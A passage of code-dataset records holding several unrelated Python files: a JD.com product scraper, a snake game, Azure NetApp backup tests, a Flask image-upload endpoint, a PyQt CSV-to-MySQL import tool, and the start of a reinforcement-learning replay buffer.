extraction\n request_url = match_obj.group(1)\n item_id = match_obj.group(2)\n # return it to scrapy's downloader via yield; be sure to use a Request\n self.yieldPNum += 1\n yield scrapy.Request(request_url, meta={\"item_id\": item_id}, callback=self.parse_item, priority=1)\n elif re.match(\"(.*list.jd.com/.*)\", url):\n if not re.match(\".*&ev=.*\", url):\n yield scrapy.Request(url)\n\n # test against a single page\n # match_obj = re.match(\"(.*item.jd.com/(\\d+).html.*)\", response.url)\n # item_id = match_obj.group(2)\n # yield scrapy.Request(response.url, meta={\"item_id\": item_id}, callback=self.parse_item, priority=1)\n\n def parse_item(self, response):\n\n item_loader = JDItemLoader(item=JdspiderItem(), response=response)\n item_id = response.meta.get(\"item_id\", \"\")\n e = False\n if item_id:\n if (response.css(\".breadcrumb\")):\n # book category\n if not response.css(\".m-itemover\"):\n # check whether the item has been taken off the shelves\n tag_list = self.get_book_tag_list(response=response)\n item_loader.add_value(\"item_id\", item_id)\n item_loader.add_css(\"name\", \"#name h1::text\")\n item_loader.add_value(\"summary\", self.get_summary(response=response)) # loaded via js\n item_loader.add_value(\"price\", self.get_a_price(response=response)) # loaded via js\n item_loader.add_value(\"tag_1\", tag_list[0])\n item_loader.add_value(\"tag_2\", tag_list[1])\n item_loader.add_value(\"tag_3\", tag_list[2])\n item_loader.add_value(\"tag_4\", tag_list[3])\n item_loader.add_value(\"dianpu_name\", self.get_book_dianpu_name(response=response))\n item_loader.add_value(\"jself\", self.get_jself(response=response))\n item_loader.add_value(\"crawl_time\", datetime.datetime.now())\n e = True\n elif(response.css(\"#crumb-wrap\")):\n # non-book category, and not redirected to the home page\n if not response.css(\".itemover\"):\n # check whether the item has been taken off the shelves\n tag_list = self.get_tag_list(response=response)\n item_loader.add_value(\"item_id\", item_id)\n item_loader.add_css(\"name\", \".ellipsis::attr(title)\")\n item_loader.add_css(\"summary\", \".sku-name::text\")\n # item_loader.add_css(\"price\", \".summary-price-wrap .price::text\")\n item_loader.add_value(\"price\", self.get_b_price(response=response))\n item_loader.add_value(\"tag_1\", tag_list[0])\n item_loader.add_value(\"tag_2\", tag_list[1])\n item_loader.add_value(\"tag_3\", tag_list[2])\n item_loader.add_value(\"tag_4\", tag_list[3])\n item_loader.add_value(\"dianpu_name\", self.get_dianpu_name(response=response))\n item_loader.add_value(\"jself\", self.get_jself(response=response))\n item_loader.add_value(\"crawl_time\", datetime.datetime.now())\n e = True\n if e:\n jd_item = item_loader.load_item()\n print(\"return jd_item\")\n return jd_item\n\n def get_a_price(self, response):\n price = response.css(\"#jd-price::text\").extract()[0]\n if \"¥\" in price:\n price = price.replace(\"¥\", \"\")\n try:\n price = float(price)\n except:\n price = 0\n return price\n\n def get_b_price(self, response):\n itemId = response.meta.get(\"item_id\", \"\")\n price = response.css(\".J-p-{0}::text\".format(itemId)).extract()[0]\n if \"¥\" in price:\n price = price.replace(\"¥\", \"\")\n try:\n price = float(price)\n except:\n price = 0\n return price\n\n def get_book_dianpu_name(self, response):\n dianpu_name = response.xpath(\"//div[@class='seller-infor']/a/@title\").extract()\n if not dianpu_name:\n dianpu_name.append(\"京东自营\")\n return dianpu_name\n\n def get_dianpu_name(self, response):\n dianpu_name = response.xpath(\"//a[@clstag='shangpin|keycount|product|dianpuname1']/@title\").extract()\n if not dianpu_name:\n dianpu_name.append(\"京东自营\")\n return dianpu_name\n\n def get_jself(self, response):\n jself = response.css(\".u-jd\")\n if jself:\n return 1\n else:\n return 0\n\n def get_book_tag_list(self, response):\n tag_list = response.css(\".breadcrumb a::text\").extract()\n for i in range(4 - len(tag_list)):\n tag_list.append(\"...\")\n return tag_list\n\n def get_tag_list(self, response):\n tag_list = response.css(\"#crumb-wrap .crumb a::text\").extract()\n for i in range(4 - len(tag_list)):\n tag_list.append(\"...\")\n return tag_list\n\n def get_summary(self, response):\n summary = \"作者:\" + response.css(\"#p-author a::text\").extract_first(\"\") + \";\" \\\n + response.css(\"#p-ad::text\").extract_first(\"\")\n return summary\n\n\n","sub_path":"JdSpider/spiders/jd_spider.py","file_name":"jd_spider.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"374784616","text":"from graph import *\n\ncanvasSize(400, 400)\nbrushColor(0, 0, 255)\nrectangle(0,0,400,400)\n\nx=200\ny=50\na=10\nN=10\ndx=0\ndy=0\nsnake = []\npenColor(\"yellow\")\nbrushColor(\"yellow\")\nfor i in range(N):\n obj = rectangle(x+i*a, y, x+i*a+a, y+a)\n snake.append( obj )\n brushColor(\"green\")\n\ndef moveSnake(xNew, yNew):\n global x, y\n for k in range(len(snake)-1,0,-1):\n newCoord = coords(snake[k-1])\n moveObjectTo(snake[k], newCoord[0],\n newCoord[1])\n moveObjectTo(snake[0], xNew, yNew)\n x = xNew\n y = yNew\n\ndef keyPressed(event):\n global dx, dy\n if event.keycode == VK_LEFT:\n dx = -1\n dy = 0\n elif event.keycode == VK_RIGHT:\n dx = 1\n dy = 0\n elif event.keycode == VK_UP:\n dx = 0\n dy = -1\n elif event.keycode == VK_DOWN:\n dx = 0\n dy = 1\n elif event.keycode == VK_SPACE:\n dx = 0\n dy = 0\nonKey(keyPressed)\n\ndef update():\n if dx or dy:\n moveSnake( x + dx*a , y + dy*a )\nonTimer(update, 50)\nrun()","sub_path":"lab3/4.Кривая змейка.py","file_name":"4.Кривая змейка.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"370287980","text":"#-*- coding:utf-8 -*-\n# author:29557\n# datetime:2018/9/7 11:31\n# software: PyCharm\n\nimport subprocess\n# cmd = 'start /b appium -a 127.0.0.1 -p 4444 --bootstrap-port 4445'\ncmd = 'adb devices'\na = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nb = a.communicate()\nprint(b)","sub_path":"src/xwp/SunmiRecovery/RecoveryApi.py","file_name":"RecoveryApi.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"273669332","text":"from azure.mgmt.resource import ResourceManagementClient\nfrom devtools_testutils import AzureMgmtRecordedTestCase, recorded_by_proxy, set_bodiless_matcher\nfrom azure.mgmt.netapp.models import Backup\nfrom test_volume 
import delete_volume\nfrom test_backup import create_backup, disable_backup\nimport setup\nimport azure.mgmt.netapp.models\n\nclass TestNetAppAccountBackup(AzureMgmtRecordedTestCase):\n\n def setup_method(self, method):\n self.client = self.create_mgmt_client(azure.mgmt.netapp.NetAppManagementClient)\n print(\"Live status: {0}\".format(self.is_live))\n if self.is_live:\n print(\"Live global status: {0}\".format(setup.LIVE))\n setup.LIVE = True\n print(\"Live global status after set: {0}\".format(setup.LIVE))\n\n # Before tests are run live a resource group needs to be created along with vnet and subnet\n # Note that when tests are run in live mode it is best to run one test at a time.\n @recorded_by_proxy\n def test_list_account_backups(self):\n print(\"Starting test_list_account_backups\")\n set_bodiless_matcher()\n volumeName1 = self.get_resource_name(setup.TEST_VOL_1+\"-\")\n backup1 = self.get_resource_name(setup.TEST_BACKUP_1+\"-\")\n backup2 = self.get_resource_name(setup.TEST_BACKUP_2+\"-\")\n\n try:\n create_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup1, backup_only=False)\n create_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup2, backup_only=True)\n\n account_backup_list = self.client.account_backups.list(setup.TEST_RG, account_name=setup.PERMA_ACCOUNT)\n backup_count = 0\n for backup in account_backup_list:\n if backup1 in backup.name or backup2 in backup.name:\n backup_count += 1\n\n assert backup_count == 2\n finally:\n disable_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup1)\n disable_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup2)\n\n account_backup_list = self.client.account_backups.list(setup.TEST_RG, setup.PERMA_ACCOUNT)\n backup_count = 0\n for backup in account_backup_list:\n if backup1 in backup.name or backup2 in backup.name:\n backup_count += 1\n\n delete_volume(self.client, setup.TEST_RG, setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1)\n assert backup_count == 0\n \n print(\"Finished with test_list_account_backups\")\n\n @recorded_by_proxy\n def test_get_account_backups(self):\n print(\"Starting test_get_account_backups\")\n set_bodiless_matcher()\n volumeName1 = self.get_resource_name(setup.TEST_VOL_1+\"-\")\n backup1 = self.get_resource_name(setup.TEST_BACKUP_1+\"-\")\n try:\n create_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, vnet=setup.PERMA_VNET, backup_name=backup1)\n\n account_backup = self.client.account_backups.get(setup.TEST_RG, setup.PERMA_ACCOUNT, backup1)\n assert account_backup.name == setup.PERMA_ACCOUNT + \"/\" + backup1\n finally:\n disable_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup1)\n delete_volume(self.client, setup.TEST_RG, setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1)\n \n print(\"Finished with test_get_account_backups\")\n\n @recorded_by_proxy\n def test_delete_account_backups(self):\n print(\"Starting test_delete_account_backups\")\n set_bodiless_matcher()\n volumeName1 = self.get_resource_name(setup.TEST_VOL_1+\"-\")\n backup1 = self.get_resource_name(setup.TEST_BACKUP_1+\"-\")\n \n try:\n create_backup(self.client, 
account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, vnet=setup.PERMA_VNET, backup_name=backup1)\n\n account_backup_list = self.client.account_backups.list(setup.TEST_RG, setup.PERMA_ACCOUNT)\n assert len(list(account_backup_list)) >= 1\n finally:\n delete_volume(self.client, setup.TEST_RG, setup.PERMA_ACCOUNT, setup.PERMA_POOL, volumeName1)\n self.client.account_backups.begin_delete(setup.TEST_RG, setup.PERMA_ACCOUNT, backup1).wait()\n\n account_backup_list = self.client.account_backups.list(setup.TEST_RG, setup.PERMA_ACCOUNT)\n for backup in account_backup_list:\n assert backup.name != setup.PERMA_ACCOUNT + \"/\" + backup1\n\n print(\"Finished with test_delete_account_backups\")","sub_path":"sdk/netapp/azure-mgmt-netapp/tests/test_account_backup.py","file_name":"test_account_backup.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"653518762","text":"import logging\nimport os\nimport time\n\nimport werkzeug.datastructures\nfrom flask import current_app as app\nfrom flask import session\nfrom flask_login import login_required\nfrom flask_restplus import Namespace\nfrom flask_restplus import Resource\n\nfrom app.extensions import api\nfrom app.services.aws.s3 import amazon_s3\n\nlog = logging.getLogger(__name__)\n\nns = Namespace('tools', path='/', description='Shared Tools API')\n\nfile_upload = ns.parser()\n\nfile_upload.add_argument(\n 'upload_type',\n type=str,\n required=True,\n help='upload type(invoice/id/evidence)',\n location='form',\n)\nfile_upload.add_argument(\n 'pic_file',\n type=werkzeug.datastructures.FileStorage,\n location='files',\n required=True,\n help='file',\n)\n\n\n@ns.route('/upload_file')\nclass FileUpload(Resource):\n \"\"\"Upload File.\"\"\"\n\n @login_required\n @api.doc(parser=file_upload)\n @api.expect(file_upload)\n def post(self):\n log.debug(session)\n user_id = session['user_id']\n args = file_upload.parse_args()\n if args['upload_type'] not in ['invoice', 'id', 'evidence']:\n return {'state': 'incorrect upload type'}, 401\n log.debug(args['pic_file'].mimetype)\n if args['pic_file'].mimetype and len(args['pic_file'].mimetype.split('/')) == 2:\n file_type, file_format = args['pic_file'].mimetype.split('/')\n if file_type.lower() != 'image' or file_format.lower() not in [\n 'jpeg',\n 'jpg',\n 'png',\n ]:\n return {'state': 'incorrect file type/format'}, 401\n folder = app.config.get(f\"{args['upload_type'].upper()}_FOLDER\")\n destination = os.path.join(\n app.config.get('WORKING_FOLDER'), user_id, folder + '/'\n )\n if not os.path.exists(destination):\n os.makedirs(destination)\n pic_file = '%s%s' % (destination, str(int(time.time())) + '.' 
+ file_format)\n log.debug(pic_file)\n args['pic_file'].save(pic_file)\n pic_path = amazon_s3.upload_file(pic_file, folder)\n return {'state': 'Success', 'path': pic_path}, 200\n else:\n return {'state': 'failed uploading'}, 401\n","sub_path":"app/resources/tools/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"462857699","text":"import sys\nfrom PyQt4 import QtGui,QtCore,uic\nfrom PyQt4.QtCore import QVariant\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtCore import QVariant\nimport mysql.connector\nimport csv\nimport json\nimport itertools\nimport datetime\nfrom collections import OrderedDict\n\nclass connectDatabase():\n _instances = []\n _constarinTable= []\n dbHostName = \"\"\n dbLogin = \"\"\n dbPassowrd = \"\"\n dbDatabase =\"\"\n dbSchema= []\n endArray= []\n _dbData = []\n _insertSchemaArray = []\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(connectDatabase, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n def fillTAble(self):\n print(\"called fillTAble\")\n for row in connection._constarinTable:\n tmpArray=[]\n tmpArray.append(row[0])\n tmpArray.append(row[2])\n self.endArray.append(tmpArray)\n for row in enumerate(self.endArray):\n self.findID(row[1][0])\n self._instances=list(OrderedDict.fromkeys(self._instances))\n\n\n def createInsertString(self):\n print(\"called createInsertString\")\n print(self._dbData)\n print(self._instances)\n print(self._constarinTable)\n _tmpData = []\n\n insertArray = []\n insertArraySchema = []\n valueList=\"\"\n insertString=\"\"\n\n for x in self._instances:\n for y in self._constarinTable:\n if x is y[0]:\n insertArraySchema.append(y)\n\n for y in self._dbData:\n insertString2=\"\"\n for x in insertArraySchema:\n insertString=\"\"\n insertValues=\"\"\n for z in y:\n # print(z[0]+ \"== \"+x[1])\n if z[0] in x[1]:\n # print(\"weszlo\")\n insertValues = insertValues+z[0]+\"',\"\n insertString=insertString+z[1]+\"',\"\n\n insertValues=insertValues[0:-2]\n insertString=insertString[0:-2]\n insertString2 = \"INSERT INTO \"+x[0]+\" ('\"+insertValues+\"') VALUES ('\"+insertString+\"')\"\n insertArray.append(insertString2)\n self._insertSchemaArray = insertArray\n today = datetime.date.today()\n with open('insertData'+today.strftime('%d-%b-%Y')+'_insertString.txt', 'w') as outfile:\n json.dump(self._insertSchemaArray, outfile)\n # for x in insertArray:\n # print(x)\n\n\n def findID(self, id):\n print(\"called findID\")\n found=\"\"\n newArray = []\n for row in self.endArray:\n\n if row[0] is id:\n # newArray.append(row[0])\n self.findID(row[1])\n else:\n\n self._instances.append(id)\n self._instances=list(OrderedDict.fromkeys(self._instances))\n self.createInsertString()\n\n\n def filterTable(self):\n print(\"called filterTable\")\n newArray = []\n for row in enumerate(self.endArray):\n\n actualRow = row[1]\n isEmpty =0\n\n\n for row2 in self.endArray:\n\n if (row2[1] is not row[1]) and ( ):\n isEmpty =1\n else:\n isEmpty =0\n if isEmpty is 0:\n newArray.append(actualRow)\n else:\n newArray.insert(0,actualRow)\n # newArray.insert(0,actualRow) if isEmpty==1 else newArray.append(actualRow)\n self._insertSchemaArray = newArray\n\n\n\n def setDbConnection(self,_dbHostName=\"localhost\" , _dbLogin=\"newUser\" , _dbPassowrd=\"zaq\" , _dbDatabase=\"super-crm\"):\n print(\"called setDbConnection\")\n self.dbHostName = _dbHostName\n 
self.dbLogin = _dbLogin\n self.dbPassowrd = _dbPassowrd\n self.dbDatabase = _dbDatabase\n\n def getDbConnection(self):\n print(\"called getDbConnection\")\n print(self.dbHostName)\n print(self.dbLogin)\n print(self.dbPassowrd)\n print(self.dbDatabase)\n\n def getDataTables(self):\n print(\"called getDataTables\")\n print(\"login: \"+self.dbLogin)\n print(\"pass: \"+self.dbPassowrd)\n print(\"dbHostName: \"+self.dbHostName)\n print(\"dbDatabase: \"+self.dbDatabase)\n # config = {\n # 'user': self.dbLogin,\n # 'password': self.dbPassowrd,\n # 'host': self.dbHostName,\n # 'port': '3306',\n # 'database': self.dbDatabase}\n config = {\n 'user': \"newUser\",\n 'password': \"zaq\",\n 'host': \"localhost\",\n 'port': '3306',\n 'database': \"technologycupdb\"}\n\n db = mysql.connector.connect( **config)\n cursor = db.cursor()\n # cursor.execute(\"select * from information_schema.columns where table_schema = '\"+self.dbDatabase+\"' order by table_name,ordinal_position\")\n cursor.execute(\"select distinct table_name as selected_table,(SELECT GROUP_CONCAT(column_name) from information_schema.columns where table_schema = 'technologycupdb' and table_name=selected_table order by table_name,ordinal_position) from information_schema.columns where table_schema = 'technologycupdb' order by table_name,ordinal_position\")\n self.dbSchema = cursor.fetchall()\n cursor.execute(\"SELECT table_name, column_name, referenced_table_name FROM INFORMATION_SCHEMA.key_column_usage WHERE referenced_table_schema = 'technologycupdb' AND referenced_table_name IS NOT NULL ORDER BY table_name, column_name\")\n self._constarinTable = cursor.fetchall()\n\n\n\n def getTableName(self,name):\n for x in self.dbSchema:\n if name in x[1]:\n return x[0]\n\n\nclass dataAppliacation():\n print(\"called dataAppliacation\")\n dataArray = []\n dataColumnName = []\n def __init__(self):\n self.dataArray= [['00','01','02'],\n ['10','11','12'],\n ['20','21','22']]\n\n def getDataArray(self):\n return self.dataArray\n\n def setDataArray(self,newArray):\n\n self.dataArray=newArray\n\n def getColumnCount(self):\n return len(self.dataArray[0][0].split(\";\"))\n\n def getRownCount(self):\n return len(self.dataArray\n)\n\n\nclass connectionWindow(QtGui.QDialog):\n def __init__(self):\n super(connectionWindow , self).__init__()\n uic.loadUi('form2.ui', self)\n self.cancelButton.clicked.connect(self.close)\n self.connectButton.clicked.connect(self.setConnection)\n\n def setConnection(self):\n print(\"called setConnection\")\n dbHostName = self.dbHostText.text()\n dbLogin = self.dbLoginText.text()\n dbPassowrd = self.dbPasswordText.text()\n dbDatabase = self.dbNameText.text()\n connectDatabase.setDbConnection(connection,dbHostName, dbLogin, dbPassowrd, dbDatabase)\n connectDatabase.getDbConnection(connection)\n connectDatabase.getDataTables(connection)\n self.close()\n\n\nclass chooseTables(QtGui.QDialog):\n chosedValue=\"\"\n ID = \"\"\n currentColumn = \"\"\n currentRow = \"\"\n width = 0\n height = 0\n def __init__(self):\n super(chooseTables , self).__init__()\n uic.loadUi('form3.ui', self)\n self.cancelButton.clicked.connect(self.close)\n self.okButton.clicked.connect(self.chooseData)\n self.dbTables.cellClicked.connect(self.cell_was_clicked)\n self.fillData()\n\n\n def setCurrentCell(self,column=0, row=0):\n print(\"called setCurrentCell\")\n currentColumn = column\n currentRow = row\n\n def fillData(self):\n print(\"called fillData\")\n self.width = len(connection.dbSchema)\n\n self.maxLen=0\n for x in connection.dbSchema:\n if 
self.maxLenlistSize:\n listSize = len(newlist)\n\n\n self.form_widget.textEdit.setColumnCount(self.form_widget.textEdit.columnCount()+listSize)\n self.form_widget.tableDBChoose.setColumnCount(self.form_widget.tableDBChoose.columnCount()+listSize)\n for index in sorted(col):\n for item in range(0, self.form_widget.textEdit.rowCount()):\n print(str(item)+ \" \"+str(self.form_widget.textEdit.rowCount()))\n #print(self.textEdit.item(item, index.column()).text().encode('UTF8'))\n newlist = self.form_widget.textEdit.item(item, index.column()).text().split()\n #print(newlist.encode('UTF8'))\n self.form_widget.textEdit.item(item, index.column()).setBackground(QtGui.QColor(238,55,55))\n for splitListElement in enumerate(newlist):\n print(self.form_widget.textEdit.columnCount()+splitListElement[0])\n\n self.form_widget.textEdit.setItem(item,(startListCount+splitListElement[0]),QtGui.QTableWidgetItem(splitListElement[1]))\n #print(newlist)\n model = self.form_widget.textEdit.model()\n data = []\n for row in range(model.rowCount()):\n data.append([])\n for column in range(model.columnCount()):\n index = model.index(row, column)\n # We suppose data are strings\n data[row].append(str(model.data(index)))\n\n #print(data)\n self.dataAppliacations.setDataArray(data)\n for x in data:\n print(x.encode('UTF8'))\n\n def sendDataToDatabase(self):\n print(\"called sendDataToDatabase\")\n columnCount = self.form_widget.tableDBChoose.columnCount()\n rowCount = self.form_widget.textEdit.rowCount()\n print(str(columnCount)+\" \"+str(rowCount))\n insertString = \"\"\n insertArray = []\n topArray= []\n for x in range(0,columnCount):\n if self.form_widget.tableDBChoose.item(0, x) is not None:\n tableName=[]\n tableName.append(connection.getTableName(self.form_widget.tableDBChoose.item(0, x).text()))\n topArray.append(tableName)\n\n topArray.sort()\n topArray=list(topArray for topArray,_ in itertools.groupby(topArray))\n print(topArray)\n # for z in range(0,rowCount):\n # insertArray.append(topArray)\n print(columnCount)\n print(insertArray)\n for z in range(0,rowCount):\n insertArray.append([])\n for x in range(0,columnCount):\n if self.form_widget.tableDBChoose.item(0, x) is not None:\n tmpArray=[]\n tmpArray.append(self.form_widget.tableDBChoose.item(0, x).text())\n if self.form_widget.textEdit.item(z, x).type() is not None:\n tmpArray.append(self.form_widget.textEdit.item(z, x).text())\n\n curElement = connection.getTableName(self.form_widget.tableDBChoose.item(0, x).text())\n insertArray[z].append(tmpArray)\n print(insertArray)\n today = datetime.date.today()\n with open('insertData'+today.strftime('%d-%b-%Y')+'.txt', 'w') as outfile:\n json.dump(insertArray, outfile)\n connection._dbData = insertArray\n connection.fillTAble()\n\n def moveLeft(self):\n print(\"called moveLeft\")\n print(self.form_widget.textEdit.columnCount())\n col = self.form_widget.textEdit.selectedItems()\n for x in col:\n row= x.row()\n tmpArray=[]\n for y in range(x.column()+1,self.form_widget.textEdit.columnCount()):\n # print(self.form_widget.textEdit.tifeam(1,y))\n print(y)\n print(self.form_widget.textEdit.item(row,y-1).text())\n tmpArray.append(self.form_widget.textEdit.item(row,y-1).text())\n # self.form_widget.textEdit.setItem(x.row(),y-2,QtGui.QTableWidgetItem('a'))\n\n self.form_widget.textEdit.setItem(row,y-2,QtGui.QTableWidgetItem(self.form_widget.textEdit.item(row,y-1).text()))\n print('tutaj')\n print(tmpArray)\n\n\n def moveRight(self):\n print(\"called moveRight\")\n col = self.form_widget.textEdit.selectedItems()\n for x in 
col:\n for y in reversed(range(x.column(),self.form_widget.textEdit.columnCount())):\n # print(self.form_widget.textEdit.tifeam(1,y))\n if self.form_widget.textEdit.item(x.row(),y) !=None:\n print(str(self.form_widget.textEdit.columnCount())+ \" \"+ str(y))\n if y+1 == self.form_widget.textEdit.columnCount():\n print(\"powiekszono\")\n self.form_widget.textEdit.setColumnCount(self.form_widget.textEdit.columnCount()+1) \n itmBefore= self.form_widget.textEdit.item(x.row(),y).text()\n print(itmBefore)\n # self.form_widget.textEdit.setItem(1,5,QtGui.QTableWidgetItem(itmBefore))\n self.form_widget.textEdit.setItem(x.row(),y+1,QtGui.QTableWidgetItem(itmBefore))\n\n def initUI(self):\n\n openFile = QtGui.QAction(QtGui.QIcon('folder265.png'), 'Open', self)\n openFile.setShortcut('Ctrl+O')\n openFile.setStatusTip('Open new File')\n openFile.triggered.connect(self.showDialog)\n\n exitAction = QtGui.QAction(QtGui.QIcon('cross108.png'), 'Exit', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(self.close)\n\n startApp = QtGui.QAction(QtGui.QIcon('arrow16.png'), 'Start', self)\n startApp.setStatusTip('Start application')\n startApp.triggered.connect(self.sendDataToDatabase)\n\n newConnection = QtGui.QAction(QtGui.QIcon('computers3.png'), 'New connection', self)\n newConnection.triggered.connect(self.connectionView)\n\n moveLeft = QtGui.QAction(QtGui.QIcon('left224.png'), 'move left', self)\n moveLeft.triggered.connect(self.moveLeft)\n\n moveRight = QtGui.QAction(QtGui.QIcon('right224.png'), 'move right', self)\n moveRight.triggered.connect(self.moveRight)\n\n self.statusBar()\n\n splitColumn = QtGui.QAction(QtGui.QIcon('split4.png'), 'Open', self)\n splitColumn.setShortcut('Ctrl+O')\n splitColumn.setStatusTip('Open new File')\n splitColumn.triggered.connect(self.splitData)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n fileMenu.addAction(openFile)\n fileMenu.addAction(newConnection)\n fileMenu.addAction(startApp)\n fileMenu.addAction(exitAction)\n\n\n self.toolbar = self.addToolBar('Exit')\n self.toolbar.addAction(openFile)\n self.toolbar.addAction(newConnection)\n self.toolbar.addAction(splitColumn)\n self.toolbar.addAction(startApp)\n self.toolbar.addAction(exitAction)\n self.toolbar.addAction(moveLeft)\n self.toolbar.addAction(moveRight)\n\n self.setGeometry(300, 300, 650, 550)\n self.setWindowTitle('Main window')\n self.show()\n\n def connectionView(sefl):\n s = connectionWindow()\n s.exec_()\n\n def showDialog(self):\n\n fname = QtGui.QFileDialog.getOpenFileName(self, 'Open file',\n '/home')\n data = \"\"\n with open(fname, newline='') as csvfile:\n reader = csv.reader(csvfile)\n csvList = list(reader)\n self.dataAppliacations.setDataArray(csvList)\n print(self.dataAppliacations.dataArray)\n print(self.dataAppliacations.getColumnCount())\n self.form_widget.textEdit.setRowCount(self.dataAppliacations.getRownCount())\n self.form_widget.textEdit.setColumnCount(self.dataAppliacations.getColumnCount())\n self.form_widget.tableDBChoose.setColumnCount(self.dataAppliacations.getColumnCount())\n for rows in enumerate(self.dataAppliacations.getDataArray()):\n listOfElements=rows[1][0].split(\";\")\n counter= rows[0]\n for element in enumerate(listOfElements):\n print(element)\n self.form_widget.textEdit.setItem(counter,element[0],QtGui.QTableWidgetItem(element[1]))\n\n\n\nconnection = connectDatabase()\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = mainView()\n sys.exit(app.exec_())\n\n\nif __name__ == 
'__main__':\n main()\n","sub_path":"view/mainView.py","file_name":"mainView.py","file_ext":"py","file_size_in_byte":19106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"517723424","text":"import math\r\nimport random\r\nimport gym\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nfrom torch.distributions import Normal\r\nimport matplotlib.pyplot as plt\r\nfrom GridTest import Grid\r\nimport pandapower.networks as pn\r\nimport os\r\n\r\nuse_cuda = torch.cuda.is_available()\r\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\r\n\r\ndef moving_average(signal,N=20):\r\n cumsum, moving_aves = [0], []\r\n\r\n for i, x in enumerate(signal, 1):\r\n cumsum.append(cumsum[i - 1] + x)\r\n if i >= N:\r\n moving_ave = (cumsum[i] - cumsum[i - N]) / N\r\n # can do stuff with moving_ave here\r\n moving_aves.append(moving_ave)\r\n\r\n return moving_ave\r\n\r\n\r\nclass ReplayBuffer:\r\n def __init__(self, capacity, limit=200, Ns=70, Na=9):\r\n self.capacity = capacity\r\n self.buffer = []\r\n # np.empty([limit, 2*Ns+Na+2])\r\n self.position = 0\r\n self.Ns= Ns\r\n self.Na = Na\r\n self.limit = limit\r\n\r\n def push(self, state, action, reward, next_state, done):\r\n # if len(self.buffer) < self.capacity:\r\n # self.buffer.append(None)\r\n # self.buffer[self.position] = (state, action, reward, next_state, done)\r\n # self.buffer[self.position]= np.concatenate([state, action, reward, next_state, done],axis=0)\r\n self.buffer.append(np.concatenate([state, action, reward, next_state, done], axis=0))\r\n # self.position = (self.position + 1) % self.capacity\r\n self.position = self.position + 1\r\n if self.position == self.limit:\r\n self.position = 0\r\n self.buffer=self.buffer[self.limit-41:]\r\n def sample(self, batch_size):\r\n half_batch = round(batch_size/2)\r\n data= np.array(self.buffer)\r\n ind = data[:,self.Ns+self.Na].argsort()\r\n data = data[ind[::-1]]\r\n batch=data[0:batch_size,:]\r\n batch2 = np.array(random.sample(list(data[half_batch:batch_size+1,:]), half_batch))\r\n # batch= np.concatenate([batch1,batch2],axis=0)\r\n\r\n state = batch[:, 0:self.Ns]\r\n action = batch[:, self.Ns:self.Ns+self.Na]\r\n reward = batch[:, self.Ns+self.Na:self.Ns+self.Na+1]\r\n next_state = batch[:, self.Ns+self.Na+1:self.Ns+self.Na+1+self.Ns]\r\n done = batch[:,self.Ns+self.Na+1+self.Ns]\r\n # state, action, reward, next_state, done = map(np.stack, zip(*batch))\r\n return state, action, reward, next_state, done\r\n\r\n def __len__(self):\r\n return len(self.buffer)\r\n\r\n\r\nclass NormalizedActions:\r\n def __init__(self,upp=1,low=-1):\r\n self.upp = upp\r\n self.low = low\r\n\r\n def _action(self, action):\r\n low_bound = self.low\r\n upper_bound = self.upp\r\n\r\n action = low_bound + (action + 1.0) * 0.5 * (upper_bound - low_bound)\r\n action = np.clip(action, low_bound, upper_bound)\r\n\r\n return action\r\n\r\n def _reverse_action(self, action):\r\n low_bound = self.low\r\n upper_bound = self.upp\r\n\r\n action = 2 * (action - low_bound) / (upper_bound - low_bound) - 1\r\n action = np.clip(action, low_bound, upper_bound)\r\n\r\n return action\r\n\r\n\r\nclass OUNoise(object):\r\n def __init__(self, action_space, mu=0.0, theta=0.15, max_sigma=0.3, min_sigma=0.3, decay_period=10):\r\n self.mu = mu\r\n self.theta = theta\r\n self.sigma = max_sigma\r\n self.max_sigma = max_sigma\r\n self.min_sigma = min_sigma\r\n self.decay_period = decay_period\r\n self.action_dim = 
